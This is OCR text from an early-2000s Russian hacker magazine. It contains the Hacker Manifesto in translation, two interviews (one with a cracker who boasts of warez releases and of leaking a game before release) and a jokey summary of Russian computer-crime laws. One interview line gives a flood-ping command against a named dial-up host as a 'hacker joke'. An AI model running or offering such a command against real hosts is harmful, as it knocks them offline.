все мы вместе спеленали Инет :). Ведь это на- 
ше, канувшее в лету, государство вынудило 
америкосов строить свою... тьфу, нашу об- 
щую ARPAnet, из которой потом вырос Инет. 
Короче, не было бы нас - не было бы и Инета 
:). А ARPAnet сейчас просто не существует - 
растворилась в сетях Internet, частично была 
модернизирована, частично заменена. Грус- 
THO. Ну ладно, засиделся я чего-то 

с тобой, поползу потихоньку. 

Пока! й 
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мали, все газеты пестрят. 
"“ПодростРок арестован 
по обвинению в компьютерном 
преступлении", "Хакер аресто- 
ван после взлома банка"... 
Чертовы дети. Они все одина- 
ковые. 
Но вы, с вашим техно-мозгом 
пятидесятых годов, когда-ни- 
будь смотрели в глаза Хаке- 
ру? Вы когда-нибудь задумы- 
вались, что заставляет его 
двигаться, чего он ищет, что 
ему нужно? 
Я хакер, войдите в мой мир... 
Мой мир начался со школы... Я 
умнее, чем большая часть 
других детей, эта чушь, кото- 
рой меня учат, хоронит меня 
заживо... 
Чертов младшеклашка. Они 
все одинаковые. 
Я в старших классах. Я слу- 
шаю, как училка в пятнадцатый 
раз объясняет мне, как умень- 
шить что-то там такое... Да по- 
HAN я давно. “Het, Анна Михал- 
на, я вам работу не покажу. Я 
её в уме сделал". 
Чертов мальчишка. Списал, на- 
верное. Они все одинаковые. 
Я сделал открытие сегодня. Я 
открыл для себя компьютер. 
Подожди секунду, это круто. Он 
делает то, что я от него хочу. 
Если он ошибается - это отто- 
го, что я его накрутил. А не от 
того, что я ему не нравлюсь... 


= щё одного сегодня пой- 


Или он чувствует мои посяга- 
тельства... 

Или он думает, что я умная 
задница... 

Или он не хочет учиться со 
мной, и быть здесь... 

Чертов мальчишка. Только и 
делает, что в игры играет. Они 
все одинаковые. 

А потом это произошло... дверь 
в мир открылась... ворвалась в 
телефонные линии как героин 
в напряженную вену, и элек- 
тронный пульс ушел в извне, 
вдали показался отказ от 
ежедневного незнания... я на- 
шел доску. 

"Вот оно... вот сюда-то яи 
шел". 

Я знаю здесь каждого... даже 
если никогда не встречал их, 
никогда не говорил с ними, 
возможно, никогда больше не 
услышу их... Я знаю вас всех... 
Чертов мальчишка. Снова пы- 
тал телефонную линию. Они 
все одинаковые... 

Готов на свою задницу поспо- 
рить, что мы все одинаковые... 
нас кормили с ложечки дет- 
ским питанием в школе когда 
мы хотели отбивную... кусочки 
мяса, которые нам удавалось 
ухватить, были разжеванными 
и невкусными. Над нами доми- 
нировали садисты, нас игнори- 
ровали в алфавитном порядке. 
А те, кто могли нас чему-то 
научить, воспринимались нами 


как капли воды в пустыне. 
Теперь это наш мир... мир 
электронов и переключателей, 
красота бода. Мы делаем ис- 
пользование существующих 
сервисов (плата за которые 
могла бы быть мизерной, если 
бы не бешеные накрутки), бес- 
платным, а вы называете нас 
преступниками. Мы иссле- 
дуем... а вы называете нас 
преступниками. Мы ищем зна- 
НИЯ... а вы называете нас прес- 
тупниками. Мы существуем 
без цвета кожи, без нацио- 
нальностей, без религий... а вы 
называете нас преступниками. 
Вы строите атомные бомбы, вы 
разжигаете войны, вы убивае- 
те, обманываете и лжете нам, 
и пытаетесь заставить нас ве- 
рить, что это всё ради нашего 
блага, и мы уже преступники. 
Да, я преступник. Мое прес- 
тупление - любопытство. Мое 
преступление в том, что я сужу 
о людях по тому, что они гово- 
рят и думают, а не по тому, как 
они выглядят. 
Мое преступление в том, что я 
умнее вас, и вы никогда мне 
этого не простите. 
Я хакер, и это мой манифест. 
Вы можете остановить эту ин- 
дивидуальность, но вы не ос- 
тановите нас всех. В конце 
концов, мы все так по- 
хожи... 

+++Mentor++ 
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миф или реальность? 


ABATAP(AVATAR_ANGEL@MAIL.RU) 


сли ты еще не прочел статью про хак- 
= группы в этом номере, то обязательно 

прочти =). Прочитал? Отлично. Но да- 
же если и не прочитал, то не страшно. Там был 
момент, когда обсуждалась возможность присут- 
ствия девушек в хак-группах. Тогда эта тема 
особо не затрагивалась, а вот сейчас пришло 
время конкретно обсудить этот факт (благо, наз- 
вание статьи обязывает =)). Как я уже говорил, 
я всеми руками, ногами и прочими частями тела 
за присутствие девушек на хак-сцене. И не надо 
там всяких криков с задних рядов типа “женщи- 
на на корабле" и “обезьяна с гранатой". Это вам 
не мотоспорт (хотя, признаться честно, мне как 
заядлому мотоциклисту очень приятно созер- 
цать девушек на блещущих хромом чопперах). В 
конце концов девушка, которая грамотно разби- 
рается в аспектах сетевой безопасности - это 
просто отлично. Это значит, что она умная, а ум- 
ные девушки, на мой взгляд (да я думаю, что 
многие со мной согласятся), гораздо интереснее 
пустых дур, которые два слова связать не могут. 
С такой девушкой всегда есть о чем поговорить. 
Плюс - наверное, это крайне неординарные лич- 
ности, потому что не каждая девушка пойдет в 
хакеры. Короче: девушки-хакеры - это просто 
отлично. Их надо любить, уважать и на руках 
носить (да и вообще: так стоит относиться ко 
всем хорошим девушкам). Но вот один вопрос - 
существуют ли они вообще? Когда мне поручили 
(известно кто, хех) работу над этой статьей, соп- 
ровождая ее словами, что я там достану банан, 
Багиру и Каа и, вообще, все джунгли из себя вы- 
веду, то я, естественно, взялся за это дело с из- 
вестным рвением. Опасался, видишь ли, редак- 
торского произвола. Ну и, само собой, из любви 
к искусству взялся... Ох, да ладно, что там - 
люблю я девушек, и все тут! Но, поверьте мне на 
слово, при всей моей любви к девушкам кон- 
кретно представительниц хак-сцены (а мои 
поиски были ограничены российской) оказалось 
бешено тяжело найти... Я облазил весь ирк, 
тряхнул связями, искал там, искал здесь... И на- 
конец-то нашел настоящую всамделишную де- 
вушку-хакера! Ну, естественно, тут же распу- 
шил перья, высунул обаяние и всячески начал 
подлизываться, предложил встретиться, пофот- 


каться (ох, как тяжело было уговорить ее 
фоткаться... так что всего лица мы 
по известным причинам не 9! 
покажем) да и вообще 
поговорить. Ну, о не- 
легкой судьбе де- 
вушки-хакера в 
России. И вот, 
собственно, 
результат 
моих тру- 
дов 
Встре- 
чайте 

- Вед 

Hat. 


Ну, что я могу сказать - 
такие они, девушки- 
хакеры... Они и мерина 
на ходу остановят, ив 
офис горящий войдут. 
Почет им да слава! 


Девушка отлично разбирается в *nix, да и в ос- 
тальном с ней есть о чем поговорить на компью- 
терную тему, уж поверьте. Но мы не стали осо- 
60 заморачиваться на технических моментах 
разговора (“Петя, никогда не говори с девушка- 
ми о компьютерах”!), а просто пообщались. Хо- 
тя, естественно, основной темой разговора было 
“каково?”. Итак, внимайте. 


эре Почему у тебя, у девушки - и вдруг воз- 
ивы Bes НИК ТАКОЙ, МОЖНО сказать, противоес- 
тественный интерес к компьютерам? 


Red Hat: Не знаю =)), меня с детства компы 
привлекали... Все началось еще с игрушек 
на 286 машинах. Потом, когда нормальный 
комп появился :-), с модемом - естественно, 
в Инет полезла. Короче говоря, мне это все 
очень интересно было. 


ини ини Hy, В ИГрушки-то мы, положим, все иг- 
ell es рали - но почему вдруг линукс? Ведь 
винды, на первый взгляд, гораздо проще, да и 
их кругом как грязи... 


Red Hat: Линукс... Как-то узнала, что это та- 
кое, прочитала про это дело, скриншоты 
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там видела всякие. Стало интересно, что это 
за штука, ну я и решила в нее вникнуть (ес- 
ли честно - чисто из женского любопыт- 
ства). Долго, конечно. Намучилась с уста- 
новкой -)), но потом нормально... 


Никто не помогал? 


Red Hat: Не-а =), у меня предки в компах не 
шарят. Пришлось самой все. Ну а так - по- 
читала доки, поспрашивала у знающих... 
Нуи - плюс - существует множество сайтов 
про Ипих. 


Ну а как насчет программирования? 


Red Hat: Ну да, кое на чем умею :-), кое-что 
знаю хорошо, кое-что поверхностно. 

Хочу perl выучить и многое другое, време- 
ни только нет сейчас... Сессия недавно за- 
кончилась. 


У тебя нет в планах стать мембером или 
организовать какую-нибудь свою хак- 


группу? 


Red Hat: Нет. Мне много раз предлагали - я 
отказывалась. Я не считаю себя “хакером” 
да и не люблю быть похожей на других. Я 
считаю, что у каждого человека должно 
быть что-то особенное, какая-то изюминка, 
может :-)). Но компьютеры - это не особен- 
ность, это просто увлечение в жизни... 


Ты никогда не чувствовала себя белой 
вороной в кругу друзей? 


Red Hat: Нет =)). В жизни я обычная, мне 
просто нравится подолгу зависать в Инете, 
узнавать много нового... Я обычная девуш- 
ка, правда, сонная очень часто хожу после 
того как в Инете ночью сижу :-). 


Ав Инете тяжело приходится девушке 
с такими познаниями? 


Red Hat: Поначалу было тяжело. Когда 
только в Инете появилась, когда ничего не 
знала. Все начинают подсовывать трояны, 
если видят что человек - ламер. Ну а потом 
сама все поняла, и сейчас не тяжело. Я 
просто сижу тут, делаю то, что мне нужно, 
и могу быть уверена, что никто не залезет 
мне на тачку :-). 


Кстати, тебе какие мальчики нравятся, 

черненькие или беленькие (шутю)? На 
самом деле - ты предпочитаешь грамотных в 
компьютерном смысле парней или это для тебя 
не важно? 


Red Hat: =))) На эту тему можно долго раз- 
говаривать :-))). Прежде всего, мне умные 
нравятся :-)), добрые... Конечно, мне нра- 
вится, если парень знаком с компьютером и 
с Инетом - есть о чем поболтать, но я боль- 
ше ценю внутренние качества человека, 
нежели внешность, хотя бывает и такое, 
что на красавчиков западаю :). А вообще я 
люблю с Юниксоидами знакомиться =). 


Ну и в итоге - не жалеешь о том, что 
забралась в компы гораздо дальше, 
чем другие девушки? Не возникало мысли, что, 


Конечно, мне нравится, если парень знаком с ком- 
пьютером ис Инетом - есть о чем поболтать, но я 
больше ценю внутренние качества человека, неже- 
ли внешность, хотя бывает и такое, что на красав- 
чиков западаю :). А вообще я люблю с Юниксоида- 


ми знакомиться =). 


мол, не женское это дело? И вообще: стоит ли 
девушке, на твой взгляд, лезть во все это? 


Red Hat: Нет =), я не жалею, я живу этим... 
Да, это не женское дело - например, висеть 
целыми сутками в Инете. Но я думаю, что 
девушкам стоит это попробовать, в образо- 
вательных целях. 


Значит, все-таки стоит тем, кто дей- 
ствительно реально оценивает свои 
возможности? 


Red Hat: Да, стоит - особенно, если человек 
знает, что ему это нравится =). 


ОК, спасибо большое, что ответила на 
вопросы Х. 


Резюме 


Ну, что я могу сказать - такие они, девушки-ха- 
керы... Они и мерина на ходу остановят, и в 
офис горящий войдут. Почет им да слава! 

Р.5. Спасибо большое Маркусу за предостав- 
ленную связь. Также спасибо Доку 
(dr.cod@xakep.ru) за фотографии. 


РЯЗГОВОР 


чтервЬГгО: 


ckyun 


NOAH (NOAH@INBOX.RU, UIN 983332) 


Wi 


Я, например, ни- 
когда бы не ска- 
зал, что дурачок, 
который прочитал 
на bugtraq или 
securefocus про 
пару дырок и схва- 
тил в зубы чужой 
сканнер, - хакер. 
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то сказал, что хакеры - это такие тем- 
к ные лошадки, которые никогда нико- 
му не дают интервью??? Вранье все 
это... А может, и не вранье :). Я сам не знаю! 
Точнее, я знаю, но тебе не скажу :). Из вред- 
ности. Короче, читай интервью с нашим (russ- 
1ап) хакером сКупс’ом. Я думаю, тут ты най- 
дешь для себя много полезной информации. 


[2 Привет, ckync! Усаживайся поудоб- 


we Hee, и мы начинаем. 


с: Привет! Ок, я готов. 


Скажи, пожалуйста, с чего ты начи- 
‘Уд нал: какой у тебя был комп, чем ты 
тогда интересовался, что изучал? 


с: Ну, спросил :-). Самый первый комп... На- 
верное, ты такого не знаешь - это был Profi 
512k. Скажем так, это что-то вроде Spectrum 
128k, только пошустрее (там, кстати, был 
эмулятор спектрума тоже). Интересовался? 
Хм, ну кодингом пытался интересоваться, 
насколько это было возможно в масштабах 
того железного ящика. Даже написал какой- 
то аналог NC под ту платформу, но после то- 
го, как оно все падало, я решил, что больше 
так продолжаться не может :-). 


\ Как же я не знаю Profi 512k?! Я дома 
we Ha таком работаю ;) (шутка). OK, ав 
какой момент ты понял, что ты - хакер? Мо- 
жет, это произошло после первого взлома или 
после первого виря, или, может, после того, 
как знакомый чел по асе сказал: “Ну, ты и 
хацкер!!!"? 


с: Ххмм, ты знаешь, я до сих пор еще не по- 
нял, что я - хакер. И, надеюсь, что никогда 
у меня не появиться такой мысли - “я - ха- 
кер”, иначе я решу, что сошел с ума. Ha мой 
взгляд, Хакер - это очень растяжимое поня- 
тие, для каждого оно может означать что-то 
свое. Понимаешь, я, например, никогда бы 
не сказал, что дурачок, который прочитал 
на bugtraq или securefocus про пару дырок и 
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Касательно моей планки, дей- 
ствия Митника недопустимы, HO я 
уже говорил о том, что планкау 


_каждого_ своя :-). 


схватил в зубы чужой сканнер, - хакер. Это 
просто слишком будет для него высокая 
оценка: он, скорее, - мелкий хулиган. И в то 
же время люди с очень широким спектром 
знаний о кодинге, об операционных систе- 
мах, о вебе, о протоколах, о многом, по- 
моему, тоже скорее гуру, чем хакеры. Одна- 
ко их знаний достаточно, чтобы осущес- 
твить хак в привычном для общества смыс- 
ле слова. Что-то подобное можно сказать и 
про меня. 


` Ты просто телепат какой-то! Мой сле- 
Уд дующий вопрос как раз на эту тему. 
Есть такая точка зрения: хакеров нет, адми- 
нов нет. Есть только грамотные, умные люди, 
и каждый из них на своем компе - админ, а на 
чужом - хакер. Ты согласен с этим или ты все- 
таки сторонник четкого отделения хакеров от 
всех остальных? 


с: Это на самом деле сложный вопрос, нес- 
мотря на то, что я ответил на предыдущий... 
Ты знаешь, я думаю, что я не смогу найти 
среди кучи своих знакомых таких, которые 
на мой вопрос: “А ты хакер?" ответят - “fa”. 
Они скорее спросят, “А чего, надо помочь?”". 
Но, в тоже время, кто-то больше любит 
красное, а кто-то желтое, но все любят 
цветное (наверное, глупый пример)... Так и 
тут, большинство реально “грамотных, ум- 
ных” людей, как ты выразился, справятся и 
с работой админа, и с работой хакера, и 
много еще с чем, но что-то им все-таки нра- 
вится больше, поэтому все-таки поделить на 
“хакеров”, “админов”, “кодеров” и т.п., я ду- 
маю, сильно постаравшись, можно :-). Но о 
том, что уровень их знаний и возможностей 
примерно одинаков (у реально толковых 
специалистов), забывать не надо. Отличный 
админ запросто станет хорошим хакером, и 
отличный хакер запросто станет хорошим 
админом :-). 


Давай немного вспомним историю с 
Y Кевином Митником. Как ты относишь- 
ся ко всей этой заварушке? Кевин - действи- 
тельно крутой хакер - один из лучших, или 
его случайно выбрали для показательной 
расправы как самого шумного и неаккуратно- 
го хакера? 


с: Хм, а следующий вопрос можно? Не очень 
люблю комментировать устаревшие, тем более 
так сильно нашумевшие в прессе события... 


Поменьше 
читать вся- 

кие глупости 
типа “Хакинг 
и Интернет” 
и “Как стать 
хакером?” и 
побольше 

читать клас- 
сики. 


Ок, так и запишем :). Хорошо, сле- 
Vp ”” дующий вопрос: существует такой 
образ благородного и гордого хакера, ло- 
мающего только исключительно ради своего 
любопытства и ради феерической идеи 
всеобщей доступности информации. Лично я 
считаю, что все это - лапша, которую хаке- 
ры вешают на уши своим подружкам и поли- 
цаям (когда их хватают после неудачных 
взломов, хе-хе). Что скажешь? 


РЯЗГОВОР 


с: Скажу следующее: для каждого должна 
быть моральная планка, в области примене- 
ния собственных знаний тоже. Касательно 
моей планки, действия Митника недопусти- 
мы, HO я уже говорил о том, что планка у 
_каждого_ своя :-). А вообще, я с тобой сог- 
ласен... Совсем недавно было же: выложила 
группа какую-то туеву тучу кредиток в он- 
лайн. Ну да, яркий пример всеобщей дос- 
тупности информации... Только все забыли, 


РЯЗГОВОР 


чего они сделали сначала - попросили у 
владельцев магазина такую же туеву тучу 
денег, чтобы эти кредитки в он-лайн не 
выкладывать :-). Так что вот яркий пример 
того, что ставится целью :-). На мой взгляд, 
у любых действий должна быть “цель”, ина- 
че они бессмысленны. Деньги - это тоже, не 
лучшая, но цель. А вот что лучше - бесцель- 
но сканить кучу подсеток ради “доступности 
информации” или пойти и провести это вре- 
мя в баре с девушкой - это вопрос :-). 
Ладно, с твоим “внутренним миром” 
` мы уже немного ознакомились :). Те- 
перь давай поговорим о том, как склады- 
ваются твои дела в последнее время. Я слы- 
шал, что ты вступил в хак-команду. Расска- 
жи о ней и о причинах, подвигнувших тебя 
на этот шаг. 


с: :-) Мне интересно будет узнать картину 
собственного “внутреннего мира” после проч- 
тения этого интервью, а то он сам (мир) - для 
меня загадка (ckync@ckync.com). По поводу 
текущих дел - ну, основной проект - это 


http://www.bugs2k.com, который на текущий 
момент является одним из самых больших 
crack-pecypcoB в мире. Завязаны контакты со 
многими crack-developers-groups, типа DAMN 
(Ivanopulo), ECLIPSE, TMG... A по поводу хак- 
команды, да, такое дело есть, HO называть это 
хак-командой не очень правильно. Группа 
называется #GotWarez? (кому интересно, 
#GotWarez?, irc.relic.net - welcome), и облас- 
ть ее интересов довольно обширна: начиная 
от релизов warez’a и crack’oB до хакинга. 
Вступил в группу потому, что ее основатели - 
мои давние друзья - попросили помочь. Я 
редко работаю в группах, сказывается слиш- 
ком индивидуальный стиль всей работы, того 
же кодинга в частности, здесь же, как ни 
странно, срабатываемся отлично - уже поряд- 
ка 20 crack release’oB выпущено, а из дости- 
жений в области хакинга могу сказать, что 
“уперли” Tribes 2 через сеть, задолго до ее 
официального релиза (на нашем канале дос- 
тупно в Warez releas’ax группы). 


А тебя самого когда-нибудь хакали? 


с: Да :). Кстати, совсем недавно взломали 
один из моих серверов :-). Буквально три 
дня назад, и, кстати, по моей глупости :). 
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Был в шоке, но доволен, что проучили (при- 
вет wolf_sheb’y). 


Хак в одиночку и скоординированный 
хак команды сильно отличаются? 


с: Сильно, но “скоординированный хак ко- 
манды” зачастую не намного эффективнее, 
а иногда даже слабее “хака в одиночку". 


А как ты относишься к акциям типа 
“NATO go home!”? Ты в ней участво- 
вал? 


с: А чего это за акция? :-) (шутка). Не-а, ни- 
когда не участвую в общественных акциях, 
эта не исключение. Мое личное мнение, что 
на текущий момент подобные выступления 
ничего не решают и ничего решать не будут. 


А если бы у тебя прямо сейчас была 
возможность сделать дефейс 
microsoft.com, стал бы ты это делать? 


с: Кстати, не поверишь (никто не верит :-)), 
но у меня реально была возможность поме- 
нять DNS сервера microsoft.com прошлым 
летом :-). А была бы сейчас возможность - 
нет, зачем? Было бы зачем - попытались бы 
найти возможность :-), Было бы зачем и бы- 
ла бы возможность - сделал бы :-). 


Вот-вот, ответ настоящего хацкера! 
Что ты посоветуешь начинающему 
i" хакеру? Какие аспекты компьютер- 


ной грамотности стоит освоить в первую 
очередь? 


с: Ты знаешь, поменьше читать всякие глу- 
пости типа “Хакинг и Интернет" и “Как стать 
хакером?” и побольше читать классики. А 
аспекты - тут мой ответ не будет отличаться 
оригинальностью - УМХ + С + ТСРЛР МЕТ- 
WORKING + PERL = RULEZ ;-). 


:) Какие технологии ты считаешь на 
сегодняшний день наиболее пер- 
спективными (будь то платформы, 
операционки, языки программирования и 
т.д.)? 


с: Я очень долгое время занимался е-сот- 
merce, 525, поэтому Ha такой вопрос “про 
технологии” не упущу шанса сказать, что 
уверен в будущем банкротстве большинства 
компаний, соответственно, е-соттегсе и 


b2b. А по поводу того, что близко к “хакин- 
гу"... Хм, операционки - Linux, особенно об- 
радовал выход нового ядра, языки програм- 
мирования для веба - php, perl. Hy а в 06- 
щем, я думаю, что, совмещая все самое луч- 
шее, можно добиться реально “перспектив- 
ной технологии”, только личной :-). За но- 
востями железа, если честно, слежу весьма 
посредственно, кстати, как-то, по-моему, в 
вашем же журнале вычитал интересную 
мысль, что Win, в отличие от UNIX, провоци- 
рует к upgrade (согласен) :-). Не очень но- 
вое, но действительно что-то интересное 
(просто недавно с ними общался) - системы 
на базе RAQ-Cobalt. 


Некоторые аналитики пророчат на- 
шей стране большое будущее в сфе- 
ре информационных технологий, чуть ли не 
роль ведущей державы в этой области. Это 
бред или реально? Если реально, то почему, 
какие у нас предпосылки к этому? 


с: Хм, ты знаешь, насчет ведущей не знаю, 
но большое будущее есть. Проще, наверное, 
опять же немножко уйти в область е-сот- 
merce. Самое главное - у Hac не dot сот, a 
dot ru, и это очень сильно меняет дело. За- 
пад живет на инвестициях, Россия на час- 
тном капитале, поэтому, посмотрев на то, 
как падают акции hi-tech компаний за рубе- 
жом, не надо делать выводы о России. Ни од- 
на иностранная hi-tech компания не может 
вывести свои акции на Российский hi-tech 
рынок, т.к. он отсутствует, в то же время 
Вымпелком и еще ряд наших hi-tech компа- 
ний успешно существуют на западном рын- 
ке. Исходя из всех этих умных мыслей, лег- 
ко проглядывается: “то, что русскому - хоро- 
шо, немцу - смерть”. Нестандартный подход, 
зачастую, приводит к действительно инте- 
ресным, порой заслуживающим уважения в 
мировых масштабах результатам. 


Расскажи напоследок какой-нибудь 
хацкерский анекдот :). 


с: ping -с 10000 -s 25000 -f 1516- 
a105.dial.sovam.com - на мой взгляд, актуаль- 
ный пример _хацкерского_ анекдота :). 


Хе-хе, я оценил :))))). Ну, на этом 
все! Спасибо за интервью! Удачи те- 


бе в твоих начинаниях. 


с: Пока. 
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Законодцатепьство 
по xaky 


ДОНОР (LEHUN@MaAIL.RU) 


Знай законы, которые ты 
нарушаешь! 


Заваливается тут ко мне как-то наш боевой ре- 
дактор Холод и произносит сакраментальную 
фразу: “Нужно знать законы, которые ты нару- 
шаешь! В лицо! Вот ты, Донор, знаешь?”". Я не 
нашел, что ответить, поэтому получил задание 
сесть за кодексы, пережевать всю эту мутохрень 
и вернуть обратно в удобоваримом виде =). По 
ходу пьесы я постараюсь познакомить тебя, пе- 
рец/перчинка, с тем, что у меня вышло. Сам(а) 
понимаешь, перепечатывать сюда законы - ма- 
разм. Я оставлю тебе их номера (не мобилы, а 
регистрационные номера =)), а ты самостоя- 
тельно посмотришь их поподробнее по какой- 
нибудь базе законодательства, если захочешь 
самостоятельно переварить тот жуткий “сукон- 
ный” язык, которым они написаны. Я же в своей 
статье передаю только суть. 


Тебе, взломщик серваков, 
потрошитель сетей 


Итак, ты порутил сервак. Сам сей факт значит 
только то, что ты - умеешь ломать серваки. Ты 
посмотрел и ушел - претензий нет. А вот если в 
результате твоего хака сервак упал или ты слил 
с него инфу, или что-то потер, или изменил, то 
к тебе активно начинает клеиться статья 272 УК 
Рф (Неправомерный доступ к компьютерной ин- 
формации). Есть тут такие слова: “...охраняемой 
законом компьютерной информации..."”. Сейчас 
я тебя просвещу, какую это информацию так ох- 
раняет закон. 

1. Сервер ты ломал ради дефейса паги Васи 
Пупкина, заполненной его опусами и потугами в 
вебдизайне, Ты изменил дизигн морды и доба- 
вил крепких словечек в опусы (так прикольнее 
=)) - ты нарушил Васино авторское право. Ди- 
зайн Naru, кстати, тоже его (права) объект. За- 
кон 06 авторском праве (№ 5351-1) занудно 
твердит нам, что Вася стал автором одновремен- 
но с окончанием родов своего творения. С этого 
момента изменение его произведений, тиражи- 
рование и распространение без его ведома - НИ- 
ЗЯ! Вася может потребовать с тебя бабла за мо- 


ральный ущерб, лажание его репутации и упу- 
щенную выгоду (3,5 копейки, которые он не заг- 
рабастал из-за тебя =)), если найдет, конечно. 
2. На серваке ты обнаружил кучу вареза и сыр- 
цы мега-пупер-крутой операционной системки 
(сервак Микрософта, ей-ей!) и, естественно, 
слил себе копию и навстраивал кучу бэкдоров. 
Ты опять вляпался в авторское право =)! Опера- 
ционки даже упомянуты в законе отдельно! 
(Хай, Билл!) Гардят права программеров: Закон 
06 авторском праве (№ 5351-1) и Закон о пра- 
вовой охране программ для ЭВМ и баз данных 
(№ 3523-1). Изучив эти закончики, ты узнаешь, 
что создал контрафактный (незаконный) экзем- 
пляр программы, который подлежит немедлен- 
ному уничтожению (вместе с компьютером =)), и 
изменил исходник, который тоже объект охра- 
ны. Будешь иметь дело уже с организацией и 
полком адвокатов. Они капнут в органы (те за- 
ведут уголовное дело) и вежливо попросят тебя 
возместить им ущерб (зряплата программеров, 
которые будут отлавливать твои бэкдоры, убыт- 
ки из-за задержки выхода операционки, мо- 
ральные страдания БГ и т.д.). Если ты прита- 
щишь им свою свинью-копилку, согла- 
сишься бесплатно кодить для них, 
т.е, “деятельно раскаешься”, то 


уголовное дело могут 
прекратить, т.к. это 
преступление 


небольшой 


Nt — 


жести. 
3. Ты взломал почтовый сервак и зачитался пе- 
репиской офигенной тетки (фота там тоже была 
=)) и какого-то романтического упыря, из кото- 
рой узнал адрес и телефон девчонки, а также 
историю ее разгульной сексуальной 
жизни летом в деревне =). Ну, ты по- 
пал! Ты нарушил конституционное 
право человека и гражданина на 
тайну переписьки. По Закону об опе- 
ративно-розыскной деятельности (№ 
144-03) такие фигли-мигли могут 
вытворять только органы, да и то 
только с санкции суда. У тебя на зад- 
нице уже проступили циферки 138 
УК РФ (Нарушение тайны переписки, 
телефонных переговоров, почтовых 
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телеграфных и ИНЫХ сообщений). Если ты не 
понравишься перчинке, тебя ждет штраф в раз- 
мере 50-100 минималок или зряплаты за месяц, 
или 120-180 часов чистки милицейских галью- 
нов, или год исправительных работ. Зависит от 
того, насколько не понравишься девчонке и кто 
ее папа. 

4. Ты взломал сервак Минобороны и обнаружил 
там план уничтожения ламерикосов за 37 минут 
15 секунд... Хотя это вряд ли. Ну, подрубился к 
сетке секретного НИИ через комп какого-нибудь 
ротозея и слил оттуда чертежи новой сверхско- 
ростной торпеды. Значит ты получил сведения, 
составляющие государственную тайну. Пере- 
чень сведений, относимых к гостайне ты смо- 
жешь найти в Законе о государственной тайне 
(№5485-1). Также из этого закона можно уз- 
нать, что есть 3 степени секретности информа- 
ции, которые соответствуют грифам “особой 
важности”, “совершенно секретно", “секретно”, 
а также степени ущерба безопасности страны в 
случае ее разглашения. И что необходимо иметь 
соответствующий допуск для доступа к этой ин- 
формации (сложная процедура, связанная с 
тщательной проверкой тебя, любимого, на вши- 
BocTb). По шапке в первую очередь получит ро- 
тозей, через чей комп ты прорвался. Его статья 
283 УК РФ (Разглашение государственной тай- 
ны). Ты подпадаешь под действие статьи 272 УК 
Рф (Неправомерный доступ к компьютерной ин- 
формации) - до 2 лет лишения свободы. Если же 
ты передашь полученные данные иностранной 
разведке, то ты распоследняя 6... бяка, шпион и 
изменник! Твоя статья 275 УК РФ (Государствен- 
ная измена), и сидеть тебе 20 лет. Стоит ли это 
каких-то баксов?! 


Тебе, кардер, грабитель 
банков 


Ну что, братишка, разжился кредами и швы- 
ряешь баксы направо и налево? Посмотрим, че- 
го ты там понарушал. 

1. Ты рассказал ламеру ушастому, что, забив но- 
мер своей креды в форму на твоей страничке, он 
получит золотые горы от компании Помпухин- 
Траст, а потом закупил себе по его карточке па- 
py шелов, кучу доступов на порно-сервера и т. 
д. Тебе светит статья 159 УК РФ (Мошонничес- 
тво), которое суть есть хищение чужого имущес- 
тва (бабла) путем обмана или злоупотребления 
доверием. Тебе дадут по шее либо оштрафуют 
на 200-700 минималок или на 2-7 зряплат, зас- 
тавят чистить конюшни 180-240 часов без сна и 
еды, а могут и посадить на 3 года. 

2. Тебя угораздило ломануть интернет-магазин и 
оттяпать списки номеров кредиток. Потом ты по- 
шел на Ирку и часть (похуже) подарил, часть 
(получше) обменял на всякие рулесы, а самые 
мазовые зажал до поры. А еще похвастался дру- 
ганам, что нагнул Толстосумова, у которого на 
счету до фига бабла. Кроме 272 УК РФ, которая 


у тебя на мышке уже вытатуирована, тебя хочет 
183 УК РФ (Незаконное получение и разглаше- 
ние сведений, составляющих коммерческую или 
банковскую тайну). Готовься отдать денюжку 
(100-200 минимумов) либо сесть на 2 года. 

3. Ты ограбил банк, находящийся в Венесуэле, 
не отрывая попец от табуретки. Поздравляю! Но 
не спеши шелестеть страницами, выискивая 
статью “Грабеж”. Твоя статья - 158 УК РФ (Кра- 
жа), или ТАЙНОЕ присвоение чужого имущества 
(капустки). Тебя ждут от 5 до 10 лет лишения 
свободы, пусть даже банк и иностранный. Кста- 
ти, очень интересно, будут ли когда-нибудь со- 
вершены преступления типа “виртуальный гра- 
беж” (открытое хищение) и “виртуальный раз- 
бой" (нападение с целью хищения и угрозы при- 
менения насилия). Представь себе пулеметы ав- 
томатической охранной системы, направленные 
на банкиров, и голос из репродуктора: “Бла! 
Клади деньги на этот счет, а то всех в винегрет 
покрошу!!!". 


Тебе, вирмейкер 


Здорово, творец коня-убийцы, прущего поро- 
ли пачками, форматирующего винты, уничто- 
жающего сети. Если докажут, что этот зверь - 
твой питомец, в тебя вцепится 273 УК РФ 
(Создание и распространение вредоносных 
программ для ЭВМ). Тебя сразу лишат невин- 
ности, т.е. посадят на срок до 3 лет плюс 
возьмут штраф 200-500 минималок. Если твой 
вирь замочил тучу систем и принес ущерб на 
многие пачки баксов, то мотать тебе от 3 до 7 
лет. Господа недохакеры, юзающие этого зве- 
ря и ему подобных, вам тоже не удастся пос- 
пать спокойно. Все вышесказанное справед- 
JIMBO и для вас, так как вы используете и рас- 
пространяете вредоносную программу. А как 
вы хотели: отец один за всех отдувается?! 


РЕШЕТНЯ 


Тебе, фрикер 


Как живешь, злобный поработитель чужих теле- 
фонов и пагеров? Все - пинцет? Ну, это ненадол- 
го. 

1. Чем ты сегодня занимался? Сканировал ок- 
рестные дома на предмет пустующих баз и неиз- 
вестно где валяющихся трубок, чтобы потом на- 
казать вислоухого ламера, обсудив его легко- 
мысленность с грудастой теткой из секса-по-те- 
лефону. Ну так вота: твоя трубка-сканер отно- 
сится к радиоэлектронным высокочастотным ус- 
тройствам, которые по Закону о связи (№ 15- 
ФЗ) подлежат обязательной регистрации и на 
которые треба разрешение. (Кстати, узнать, на 
что еще нужно разрешение, ты можешь в Поста- 
новлении Правительства РФ от 17 июля 1996 г. 
М 832 “Об утверждении особых условий приоб- 
ретения радиоэлектронных средств и высоко- 
частотных устройств”, подписанном Черным 
Мордиком.) Кто ж тебе такое разрешение даст? 
А значит, статья 137 Кодекса об административ- 
ных правонарушениях (КОАП мне больше нра- 
вится =)) откусит от твоей пачки баксов 20-70 
минимумов, а товарисчи в погонах изымут иг- 
рушку в свою пользу. По этой же статье получит 
по рогам тот, кто тебе эту девайсину продал. А 
еще ты будешь должен возместить убытки МГТС. 
2. Ты нарыл спец. оборудование и теперь мони- 
торишь пагерные сообщения или вклиниваешь- 
ся в разговоры бизнесменов, обсуждающих це- 
